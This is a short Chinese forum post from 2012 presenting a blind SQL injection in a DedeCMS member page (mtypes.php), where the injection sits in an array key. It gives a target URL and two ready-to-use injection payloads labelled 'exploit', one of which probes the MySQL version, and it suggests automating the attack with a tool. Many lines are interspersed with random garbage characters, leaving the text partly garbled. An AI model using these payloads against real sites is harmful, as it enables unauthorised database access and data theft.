需要magic_quotes_gpc = Off,所以说是鸡肋啊., K5 U$ Y; f+ @: m6 R
! }' Q! N6 x7 B# i0 }' z 1 u+ a5 e+ C" n/ z o0 ]5 W8 D1 W
发生在数组key里的注射漏洞,有点意思.
t/ t6 H) d y- q2 x" Q4 q# J& i6 I
% C' g8 r9 Q- z" }$ u这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下 T B, s2 R0 q( p4 U3 C! v
: g. \& o" W" Uhttp://www.xxx.com /dede/member/mtypes.php?dopost=save# o* c8 C* `; @5 a, s) e
/ r/ ]" A$ |5 u; R$ a% g; E3 wexploit:
# _3 h7 {6 ?+ smtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r) n' s- X8 M9 h! O/ N4 h- X) j
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r; R! D% T, y- B! [0 `" ^4 [& z- e) t
|
发表于 2012-12-20 08:08:09
收藏
支持
反对